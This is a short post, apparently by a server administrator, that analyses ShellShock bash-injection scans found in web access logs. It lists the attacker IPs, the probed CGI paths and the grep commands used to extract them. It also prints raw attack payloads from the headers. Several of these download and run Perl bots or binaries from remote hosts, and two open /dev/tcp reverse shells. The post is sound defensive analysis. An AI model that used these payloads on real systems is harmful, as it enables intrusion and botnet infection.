ShellShock Scans (Update)
A little grep'ing through logs reveal the following scan patterns (red: October):
Source IPs:
146.71.113.194 188.138.33.11 192.210.219.20 192.227.213.66 198.20.69.74 207.240.10.33 209.126.230.72 37.59.196.199 46.105.14.134 54.251.83.67 64.15.147.111 64.251.176.240 84.200.228.109 89.207.135.125
Page Requests:
GET /admin.cgi HTTP/1.1
GET //cgi-bin/bash HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/hello HTTP/1.1
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.1
GET /cgi-bin/php5? HTTP/1.1
GET /cgi-bin/php.fcgi HTTP/1.0
GET /cgi-bin/php? HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/test-cgi HTTP/1.1
GET /cgi-bin/test.cgi HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.1
GET / HTTP/1.0
GET / HTTP/1.1
GET /phppath/cgi_wrapper? HTTP/1.1
GET /phppath/php? HTTP/1.1
GET /tmUnblock.cgi HTTP/1.1
GET /cgi-bin/contact.cgi HTTP/1.1
GET /cgi-bin/defaultwebpage.cgi HTTP/1.1
GET /cgi-bin/env.cgi HTTP/1.1
GET /cgi-bin/forum.cgi HTTP/1.1
GET /cgi-bin/hello.cgi HTTP/1.1
GET /cgi-bin/index.cgi HTTP/1.1
GET /cgi-bin/login.cgi HTTP/1.1
GET /cgi-bin/main.cgi HTTP/1.1
GET /cgi-bin/meme.cgi HTTP/1.1
GET /cgi-bin/recent.cgi HTTP/1.1
GET /cgi-bin/sat-ir-web.pl HTTP/1.1
GET /cgi-bin-sdb/printenv HTTP/1.1
GET /cgi-bin/signon.cgi HTTP/1.1
GET /cgi-bin/test-cgi.pl HTTP/1.1
GET /cgi-bin/test.sh HTTP/1.1
GET /cgi-bin/tools/tools.pl HTTP/1.1
GET /cgi-mod/index.cgi HTTP/1.1
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
GET /cgi-sys/entropysearch.cgi HTTP/1.1
GET / HTTP/1.1
GET /phppath/cgi_wrapper HTTP/1.1
GET /phppath/php HTTP/1.1
Payloads Referer:
() { :; }; /bin/ping -c 1 104.131.0.69 () { :; }; ping -c 11 209.126.230.74 () { :; }; ping -c 11 216.75.60.74
Payloads User Agent:
() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\""
() { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z test.john-neil.com/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
() { :; }; /bin/ping -c 1 104.131.0.69"
() { :;}; /bin/ping -c 1 198.101.206.138"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
() { :;}; /bin/bash -c \"wget -O /var/tmp/muie.png actualproduce.com/js/nice.png;perl /var/tmp/muie.png\""
() { :;}; echo('VULNZZ');system('wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl');"
() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nVULNZZZ!\";system(\"wget http://82.165.37.214/android.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
Commands used for grep'ing:
Source IPs:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d " " -f 1 | sort -u
Page Requests:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 2 | sort -u
Payloads Referer:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 4 | grep -v "^-$" | sort -u
Payloads User Agent:
grep -e "( *)" *-access.log* | cut -d ":" -f 2- | cut -d '"' -f 6- | grep -e "( *)" | sort -u